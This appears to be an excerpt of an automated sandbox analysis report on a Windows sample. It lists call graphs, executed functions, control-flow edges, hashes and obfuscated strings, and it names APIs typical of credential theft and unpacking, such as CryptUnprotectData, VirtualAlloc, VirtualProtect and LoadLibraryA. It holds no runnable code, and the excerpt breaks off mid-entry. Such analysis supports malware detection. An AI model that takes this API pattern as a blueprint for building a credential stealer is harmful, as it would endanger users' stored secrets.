RtlAllocateHeap LdrInitializeThunk 22192->22193 22194 413d68 22193->22194 22195 420880 RtlAllocateHeap LdrInitializeThunk 22194->22195 22196 413d71 22195->22196 22197 420d60 RtlAllocateHeap LdrInitializeThunk 22196->22197 22198 413d7a 22197->22198 22199 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22198->22199 22200 413d84 22199->22200 22201 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22200->22201 22202 413da4 22201->22202 22203 425260 RtlAllocateHeap 22202->22203 22204 413dba 22203->22204 22205 42eab0 6 API calls 22204->22205 22206 413dc3 22205->22206 22208 41d016 22207->22208 22209 41d069 RtlExpandEnvironmentStrings 22207->22209 22208->22209 22210 41d0ae 22209->22210 22211 435440 RtlAllocateHeap 22210->22211 22212 41d0be RtlExpandEnvironmentStrings 22211->22212 22213 41d13b 22212->22213 22214 435440 RtlAllocateHeap 22213->22214 22215 41d1ca 22214->22215 22216 43a250 2 API calls 22215->22216 22217 41d247 22216->22217 22218 42f3f6 22221 42fae0 22218->22221 22222 42fb34 22221->22222 22223 435440 RtlAllocateHeap 22222->22223 22224 42fc14 22223->22224 22225 431df6 22226 431dfb 22225->22226 22227 435440 RtlAllocateHeap 22226->22227 22228 431e09 22227->22228 22229 43a530 LdrInitializeThunk 22228->22229 22230 431e33 22229->22230 22368 43803b 22370 437f65 22368->22370 22369 4380c5 22370->22368 22370->22369 22372 4373e0 LdrInitializeThunk 22370->22372 22372->22370 22373 5ddf24 22374 5ddf2f 22373->22374 22377 5ddf96 22374->22377 22378 5ddfa5 22377->22378 22381 5de736 22378->22381 22386 5de751 22381->22386 22382 5de75a CreateToolhelp32Snapshot 22383 5de776 Module32First 22382->22383 22382->22386 22384 5ddf95 22383->22384 22385 5de785 22383->22385 22388 5de3f5 22385->22388 22386->22382 22386->22383 22389 5de420 22388->22389 22390 5de469 22389->22390 22391 5de431 VirtualAlloc 22389->22391 22390->22390 22391->22390 22392 41a63b 22393 41a640 22392->22393 22393->22393 22394 41a800 2 API calls 22393->22394 22395 41a6f9 22394->22395 22236 41a77a 22237 41a793 22236->22237 22240 41a800 22237->22240 22241 43a060 2 API calls 22240->22241 22242 41a859 22241->22242 22243 4337fd 22246 439500 22243->22246 22245 43382b GetVolumeInformationW 22396 43793d 22398 437982 22396->22398 22397 4379ee 22398->22397 22400 4373e0 LdrInitializeThunk 22398->22400 22400->22397 22247 41537e 22248 415388 22247->22248 22249 435440 RtlAllocateHeap 22248->22249 22251 4154e8 22249->22251 22250 415635 CryptUnprotectData 22251->22250

                                                                        Executed Functions

                                                                        Function 0042EC90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                                                        • String ID:
                                                                        • API String ID: 1449868515-3916222277
                                                                        • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                        • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                                        • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                        • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                                        Function 00427353 Relevance: 9.9, APIs: 2, Strings: 3, Instructions: 1198COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2PBb$Yceh$]hW9
                                                                        • API String ID: 0-1551782443
                                                                        • Opcode ID: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                                        • Instruction ID: 0399154fc7d8c55f12102b5960697b3d06da357f666e701177502f53bd351286
                                                                        • Opcode Fuzzy Hash: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                                        • Instruction Fuzzy Hash: B7926C70208B908EE726CF35C4A07E7BBE1BF16305F44499DD1EB8B282DB796509CB55
                                                                        Function 0041FD10 Relevance: 6.8, Strings: 5, Instructions: 531COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 419 41fd10-41fd3b 420 41fdc0-41ff6c 419->420 421 420000-4201ac 419->421 422 41fd42-41fd4f 419->422 423 41ffb4-41ffb7 419->423 424 41fd8c 419->424 425 41ffbe-41ffe5 call 43ad30 419->425 435 41ff97-41ffa6 call 43a900 420->435 436 41ff6e-41ff6f 420->436 433 4201d7-4201eb call 43a900 421->433 434 4201ae-4201af 421->434 422->422 430 41fd70-41fd7e 422->430 431 41fda0-41fdaf 422->431 432 41fd85 422->432 423->425 426 420200-42020a 423->426 427 420220-42026d call 437200 423->427 428 41ffec 423->428 424->431 425->427 425->428 426->427 446 420502-420507 427->446 447 420523-42056f 427->447 448 4204a0-4204ab 427->448 449 420280-420291 call 43a900 427->449 450 4202a5 427->450 451 420645-42064c 427->451 452 42062f 427->452 453 4204ec 427->453 454 420512-42051c 427->454 455 420653-42065d 427->455 456 4202b0-420325 427->456 457 420510 427->457 458 4204f6-4204ff call 4087a0 427->458 459 420636-42063e 427->459 460 420397 427->460 461 420399-4203a1 427->461 462 42061e-420628 427->462 428->421 430->422 430->432 431->420 431->422 431->432 432->424 433->426 440 4201b0-4201d5 434->440 443 41ffab 435->443 442 41ff70-41ff95 436->442 440->433 440->440 442->435 442->442 443->423 446->457 469 4205b0-4205b8 447->469 470 420571 447->470 463 4204b2-4204d0 call 435440 call 43aa50 448->463 464 4204ad 448->464 480 420296-42029e 449->480 450->456 451->455 451->459 452->459 453->458 454->446 454->447 454->448 454->449 454->450 454->451 454->452 454->453 454->454 454->455 454->456 454->457 454->458 454->459 454->460 454->461 454->462 455->446 455->447 455->448 455->449 455->450 455->451 455->452 455->453 455->454 455->455 455->456 455->457 455->458 455->459 455->460 455->461 455->462 466 420372-420383 call 43b430 456->466 467 420327 456->467 458->446 459->446 459->447 459->448 459->449 459->450 459->451 459->452 459->453 459->454 459->455 459->456 459->457 459->458 459->459 459->460 459->461 459->462 460->461 471 4203a3-4203a7 461->471 472 4203c1-420408 461->472 462->451 462->452 462->455 462->459 496 4204d5-4204e5 463->496 464->463 485 420388-420390 466->485 481 420330-420370 467->481 476 420600-420617 call 439e00 469->476 477 4205ba-4205c6 469->477 473 420580-4205ae 470->473 474 4203b0-4203bf 471->474 478 420440-420448 472->478 479 42040a 472->479 473->469 473->473 474->472 474->474 476->451 476->452 476->455 476->459 476->462 486 4205d0-4205d7 477->486 488 420490 478->488 489 42044a-420455 478->489 487 420410-42043e 479->487 480->446 480->450 480->451 480->452 480->454 480->455 480->456 480->457 480->458 480->459 480->460 480->461 480->462 481->466 481->481 485->446 485->451 485->452 485->454 485->455 485->457 485->458 485->459 485->460 485->461 485->462 492 4205e0-4205e6 486->492 493 4205d9-4205dc 486->493 487->478 487->487 488->448 494 420460-420467 489->494 492->476 498 4205e8-4205fa call 4373e0 492->498 493->486 497 4205de 493->497 499 420470-420476 494->499 500 420469-42046c 494->500 496->446 496->449 496->450 496->451 496->452 496->453 496->454 496->455 496->456 496->457 496->458 496->459 496->460 496->461 496->462 497->476 498->476 499->488 503 420478-42048f call 4373e0 499->503 500->494 502 42046e 500->502 502->488 503->488
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gdeb$gdeb$rr$}x$a_
                                                                        • API String ID: 0-3617765606
                                                                        • Opcode ID: 160d78a6efd3da6a260afc78eb2b8a18a40a6efa094f5dd60a18feddac919ad3
                                                                        • Instruction ID: 6e898c47a17abb5f03504fba61c95c3f7ffb61a8dca5b2db11db91053f235b82
                                                                        • Opcode Fuzzy Hash: 160d78a6efd3da6a260afc78eb2b8a18a40a6efa094f5dd60a18feddac919ad3
                                                                        • Instruction Fuzzy Hash: 4E2278B4108381DFE320CF24D895B6BBBE0FB86308F54892DE5D99B262D7399505CF96
                                                                        Function 00409960 Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 507 409960-409973 508 409975-409981 507->508 509 4099c7-4099c9 507->509 511 409983-409985 508->511 512 4099ce-4099db 508->512 510 40a0c9-40a0d2 509->510 514 409987-4099c5 511->514 515 4099dd-4099e4 511->515 513 409a12-409aa1 call 4067b0 call 4336f0 call 435440 512->513 524 409aa3 513->524 525 409ae8-409b42 call 4091c0 513->525 516 4099e6-4099fb 514->516 515->516 517 4099fd-409a0d 515->517 516->513 517->513 526 409ab0-409ae6 524->526 529 409b44 525->529 530 409b96-409bfa call 4091c0 525->530 526->525 526->526 531 409b50-409b94 529->531 534 409c30-409c8a call 4091c0 530->534 535 409bfc-409bff 530->535 531->530 531->531 539 409cbb-409d07 534->539 540 409c8c-409c8f 534->540 536 409c00-409c2e 535->536 536->534 536->536 542 409d09 539->542 543 409d4d-409db2 call 4091c0 539->543 541 409c90-409cb9 540->541 541->539 541->541 545 409d10-409d4b 542->545 547 409db4 543->547 548 409df8-409faf call 409480 543->548 545->543 545->545 549 409dc0-409df6 547->549 552 409fb1 548->552 553 40a002-40a048 548->553 549->548 549->549 554 409fc0-40a000 552->554 555 40a094-40a0b4 call 40d380 call 4087a0 553->555 556 40a04a 553->556 554->553 554->554 561 40a0b9-40a0c2 555->561 557 40a050-40a092 556->557 557->555 557->557 561->510
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$01$ZR\;$[hct${hmn
                                                                        • API String ID: 0-1484469362
                                                                        • Opcode ID: 1952e586741efe349940b8b2579c31be9290b0668362d89d13c6bd99627ff31b
                                                                        • Instruction ID: 48ecf83dcb48e748d01dfa638aea1d50d8185787a1297f3da60f3c5648012799
                                                                        • Opcode Fuzzy Hash: 1952e586741efe349940b8b2579c31be9290b0668362d89d13c6bd99627ff31b
                                                                        • Instruction Fuzzy Hash: 971202B02083818BE724CF15C4A476FBBE1BBC6348F144D2DE5D58B292D77AD809CB96
                                                                        Function 0041537E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 232encryptionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041564F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: CryptDataUnprotect
                                                                        • String ID: .$=
                                                                        • API String ID: 834300711-1678909263
                                                                        • Opcode ID: 5981a5e9124ce2c7fd199e7564f4660ec5c48ed11d6919a86d8932acacd9bcf1
                                                                        • Instruction ID: 1ba618c7c74fca3a6dab2d59277d8eb37d046adcbf7b7a58cf2c090dca870eab
                                                                        • Opcode Fuzzy Hash: 5981a5e9124ce2c7fd199e7564f4660ec5c48ed11d6919a86d8932acacd9bcf1
                                                                        • Instruction Fuzzy Hash: 9481D5B1508740CFD724CF29C49179BBBE2AFD6308F184A2EE1A58B392D739D945CB46
                                                                        Function 00404970 Relevance: 2.9, Strings: 2, Instructions: 408COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$IEND
                                                                        • API String ID: 0-707183367
                                                                        • Opcode ID: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                                        • Instruction ID: 05b6572399bca2268092eb3df2821dc4a125dc7a7576062249b5a2d5c26daba1
                                                                        • Opcode Fuzzy Hash: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                                        • Instruction Fuzzy Hash: 4CE1B1B2A083449BD714CF28D88175B7BE5ABD4314F14853EFA95AB3C1D778E904CB8A
                                                                        Function 00420880 Relevance: 2.9, Strings: 2, Instructions: 390COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: ]hiX$gdeb
                                                                        • API String ID: 2994545307-4273025081
                                                                        • Opcode ID: c1389b15ebd9bc4454d69f47a51e8983982ceab371259ccb47deee0d3f6efb72
                                                                        • Instruction ID: 336b67656a256fc3d7c49e2fee8c29aa2d9fc5d5d61a2c4a19b8c8911d00a2fb
                                                                        • Opcode Fuzzy Hash: c1389b15ebd9bc4454d69f47a51e8983982ceab371259ccb47deee0d3f6efb72
                                                                        • Instruction Fuzzy Hash: B6C1E3B17083118FD714CF15D89172BBBE1EBD5318FA48A2EE4959B382D738D845CB8A
                                                                        Function 004168EF Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: IO
                                                                        • API String ID: 0-3981347273
                                                                        • Opcode ID: d76fc23780b8b3708350e07c8a348741ecdd66ae8275a383e63f3e58709d03e5
                                                                        • Instruction ID: 51fd4917a3c3351c2bbf2a3dc6b6b13a62bcc2487d4881d1c48f1649ea521d72
                                                                        • Opcode Fuzzy Hash: d76fc23780b8b3708350e07c8a348741ecdd66ae8275a383e63f3e58709d03e5
                                                                        • Instruction Fuzzy Hash: 94D132B1200B018BD724CF15C590B52BBF2FF4A704F158A9DD89A8FB56D739E985CB88
                                                                        Function 00415FE1 Relevance: .1, Instructions: 112COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dfbe77f11fd2a3400dddf2b914f793015f146d5b479b55d28ac242ef93d89d80
                                                                        • Instruction ID: 02b8bb6e56041378f4f9f2711353cce18edc58b923ed8b10765db063976cd2a1
                                                                        • Opcode Fuzzy Hash: dfbe77f11fd2a3400dddf2b914f793015f146d5b479b55d28ac242ef93d89d80
                                                                        • Instruction Fuzzy Hash: EA41BD745083528BC724CF14C8617ABB7E1FF89358F054A1DE9DA9B381E7389985CB8A
                                                                        Function 0042B20E Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                                        • Instruction ID: 151cf318142fe4857ebf8dfdf36c3425f9736b69a2a980a3f824acb8caea4c7c
                                                                        • Opcode Fuzzy Hash: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                                        • Instruction Fuzzy Hash: 36F039B45093418FC320EF25D55474ABBE1ABD8304F01882DE489C7391DBB99858CF86
                                                                        Function 0056003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 26 56003c-560047 27 56004c-560263 call 560a3f call 560e0f call 560d90 VirtualAlloc 26->27 28 560049 26->28 44 560265-560289 call 560a69 27->44 45 56028b-560292 27->45 31 56004a 28->31 31->31 50 5602ce-5603c2 VirtualProtect call 560cce call 560ce7 44->50 47 5602a1-5602b0 45->47 49 5602b2-5602cc 47->49 47->50 49->47 56 5603d1-5603e0 50->56 57 5603e2-560437 call 560ce7 56->57 58 560439-5604b8 VirtualFree 56->58 57->56 60 5605f4-5605fe 58->60 61 5604be-5604cd 58->61 64 560604-56060d 60->64 65 56077f-560789 60->65 63 5604d3-5604dd 61->63 63->60 69 5604e3-560505 LoadLibraryA 63->69 64->65 70 560613-560637 64->70 67 5607a6-5607b0 65->67 68 56078b-5607a3 65->68 71 5607b6-5607cb 67->71 72 56086e-5608be LoadLibraryA 67->72 68->67 73 560517-560520 69->73 74 560507-560515 69->74 75 56063e-560648 70->75 77 5607d2-5607d5 71->77 81 5608c7-5608f9 72->81 78 560526-560547 73->78 74->78 75->65 76 56064e-56065a 75->76 76->65 80 560660-56066a 76->80 82 5607d7-5607e0 77->82 83 560824-560833 77->83 79 56054d-560550 78->79 86 560556-56056b 79->86 87 5605e0-5605ef 79->87 88 56067a-560689 80->88 90 560902-56091d 81->90 91 5608fb-560901 81->91 84 5607e4-560822 82->84 85 5607e2 82->85 89 560839-56083c 83->89 84->77 85->83 92 56056f-56057a 86->92 93 56056d 86->93 87->63 94 560750-56077a 88->94 95 56068f-5606b2 88->95 89->72 96 56083e-560847 89->96 91->90 97 56057c-560599 92->97 98 56059b-5605bb 92->98 93->87 94->75 99 5606b4-5606ed 95->99 100 5606ef-5606fc 95->100 101 56084b-56086c 96->101 102 560849 96->102 110 5605bd-5605db 97->110 98->110 99->100 104 5606fe-560748 100->104 105 56074b 100->105 101->89 102->72 104->105 105->88 110->79
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0056024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 27a86b14edabf9ade6a7e6052f94aea87cf6fba087f3c177ac7a62f14760164d
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: B2526874A01229DFDB64CF58C985BA9BBB1BF09304F1480D9E94DAB391DB30AE85DF14
                                                                        Function 0041CFA0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 307 41cfa0-41d014 308 41d016 307->308 309 41d069-41d0ac RtlExpandEnvironmentStrings 307->309 310 41d020-41d067 308->310 311 41d0b5 309->311 312 41d0ae-41d0b3 309->312 310->309 310->310 313 41d0b8-41d139 call 435440 RtlExpandEnvironmentStrings 311->313 312->313 316 41d189-41d1b6 313->316 317 41d13b 313->317 318 41d1b8-41d1bd 316->318 319 41d1bf-41d1c1 316->319 320 41d140-41d187 317->320 321 41d1c4-41d1db call 435440 318->321 319->321 320->316 320->320 324 41d201-41d211 321->324 325 41d1dd-41d1e6 321->325 327 41d231-41d242 call 43a250 324->327 328 41d213-41d21a 324->328 326 41d1f0-41d1ff 325->326 326->324 326->326 331 41d247-41d263 327->331 329 41d220-41d22f 328->329 329->327 329->329
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D0A0
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D0CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: K-K/$U5U7$\1B3
                                                                        • API String ID: 237503144-1235027928
                                                                        • Opcode ID: 9e4d9b1ca5f46c68a711a75bebcb02cde56515bb47970f41a18ba400b158c802
                                                                        • Instruction ID: 085b80d8ebaf4cdc089f22804327f41de0cf31be30b47905784d4d41386d2044
                                                                        • Opcode Fuzzy Hash: 9e4d9b1ca5f46c68a711a75bebcb02cde56515bb47970f41a18ba400b158c802
                                                                        • Instruction Fuzzy Hash: F76177B56083518FD324CF14C8A0BABB7E1EF8A308F054A1DE8E65B381D7749945CBA7
                                                                        Function 0041D8E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 380 41d8e0-41d993 381 41d9d5-41da15 RtlExpandEnvironmentStrings 380->381 382 41d995 380->382 384 41da17-41da1c 381->384 385 41da1e 381->385 383 41d9a0-41d9d3 382->383 383->381 383->383 386 41da21-41da9f call 435440 RtlExpandEnvironmentStrings 384->386 385->386 389 41dae1-41daea call 417a30 386->389 390 41daa1 386->390 393 41daef-41daf2 389->393 391 41dab0-41dadf 390->391 391->389 391->391
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041DA0A
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041DA3A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: eI.K$qs
                                                                        • API String ID: 237503144-3936219367
                                                                        • Opcode ID: 22590df5b0a7f23595e35109344cedd9b17127ade37266cabec56ebe3dcee421
                                                                        • Instruction ID: 3ad400ec4d5e0868339db15895de8c0dbb191545bfc635c07005ecffac5dc4ed
                                                                        • Opcode Fuzzy Hash: 22590df5b0a7f23595e35109344cedd9b17127ade37266cabec56ebe3dcee421
                                                                        • Instruction Fuzzy Hash: 915154B0100B009BD724CF26C890BA7BBB5FF46314F544A1CE8A64BB89D774F549CB98
                                                                        Function 00408EA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 394 408ea0-408ead call 436950 397 408eb1-408eb8 call 431710 394->397 398 408eaf 394->398 402 408eba 397->402 403 408ebc-408ef7 GetStdHandle GetConsoleWindow call 408f20 call 40a390 397->403 399 408f0b-408f14 ExitProcess 398->399 404 408f04-408f09 call 4371d0 402->404 411 408ef9 403->411 412 408efb call 40f5b0 403->412 404->399 413 408f02 411->413 415 408f00 412->415 413->404 415->413
                                                                        APIs
                                                                        Strings
                                                                        • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 00408EDE
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                                        • API String ID: 621844428-2804141084
                                                                        • Opcode ID: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                                        • Instruction ID: 4cc74d5fb66ad9159a78e8348017eb50dff1af742bc963a264908d0417922e34
                                                                        • Opcode Fuzzy Hash: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                                        • Instruction Fuzzy Hash: A5F0FFB0408202CEC750BF72D70626A7BA5AF64364F10593FEAD5A12D1EE3C84459E5F
                                                                        Function 004337FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 416 4337fd-43385d call 439500 GetVolumeInformationW
                                                                        APIs
                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00433840
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: InformationVolume
                                                                        • String ID: :$C$\
                                                                        • API String ID: 2039140958-3809124531
                                                                        • Opcode ID: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                                        • Instruction ID: 1368c0940c647f4f39a91e564e44146e6a68535283266bc39cb5798660f285bc
                                                                        • Opcode Fuzzy Hash: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                                        • Instruction Fuzzy Hash: 44F06575294701B7E718DF10EC56F1A32E0EB81B44F10482DB245AA1D0D7F5AA19DA5E
                                                                        Function 004355E0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000,00000000), ref: 0043575D
                                                                          • Part of subcall function 004373E0: LdrInitializeThunk.NTDLL(0043A22C,005C003F,00000006,00120089,?,00000018,' !",00000000,004150CA), ref: 00437406
                                                                        Strings
                                                                        Memory Dump Source
